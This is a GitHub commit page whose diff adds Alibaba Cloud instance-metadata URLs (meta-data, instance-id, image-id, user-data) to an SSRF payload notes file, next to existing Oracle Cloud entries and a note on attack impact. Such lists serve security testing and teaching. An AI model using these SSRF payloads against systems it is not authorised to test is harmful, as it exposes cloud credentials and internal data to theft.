Skip to content

Commit

Permalink
Update SSRF.md
Browse files Browse the repository at this point in the history
  • Loading branch information
0xPugal committed Nov 6, 2022
1 parent cca5895 commit 9ba6dd4
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions SSRF/SSRF.md
Original file line number Diff line number Diff line change
Expand Up @@ -297,6 +297,14 @@ Oracle Cloud:
http://169.254.169.254/opc/v1/instance/
```

```jsx
Alibaba Cloud:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
http://100.100.100.200/latest/user-data
```

## **Impact:**

An attacker can tunnel into internal networks and access sensitive internal data such as AWS metadata information.
Expand Down

0 comments on commit 9ba6dd4

Please sign in to comment.